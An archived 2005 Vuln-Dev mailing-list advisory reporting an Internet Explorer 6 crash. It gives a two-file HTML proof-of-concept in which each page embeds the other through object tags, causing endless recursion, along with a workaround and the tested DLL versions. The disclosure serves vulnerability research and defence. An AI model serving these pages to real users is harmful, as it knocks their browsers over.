Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

Microsoft Internet Explorer - Crash on processing embedded files with en

Subject: Microsoft Internet Explorer - Crash on processing embedded files with endless loop (05/28/2005)
Date: Sat, 28 May 2005 16:24:30 +0200
Microsoft Internet Explorer - Crash on processing embedded files with
endless loop (05/28/2005)


Description: There is a bug in Microsoft Internet Explorer, which causes a crash in it. The bug occurs, because Microsoft Internet Explorer doesn't limit the depth of embedded files.


Affected software: Microsoft Internet Explorer


Workaround: Deactivate "ActiveX" in the IE options menu.


Proof-of-Concept exploit:

Page #1 (save as "btf1.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>

Page #2 (save as "btf2.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>


Date of discovery: 26. September 2003


Tested software: Microsoft Internet Explorer 6 SP2 (6.0.2900.2180.xpsp_sp2_gdr.050301-1519) on a fully patched Windows XP SP2 system.


DLL versions: MSHTML.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) BROWSEUI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) SHDOCVW.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) SHLWAPI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) URLMON.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) WININET.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)


Regards,

Benjamin Tobias Franz
Germany

<Prev in Thread] Current Thread [Next in Thread>
  • Microsoft Internet Explorer - Crash on processing embedded files with endless loop (05/28/2005), Benjamin Tobias Franz <=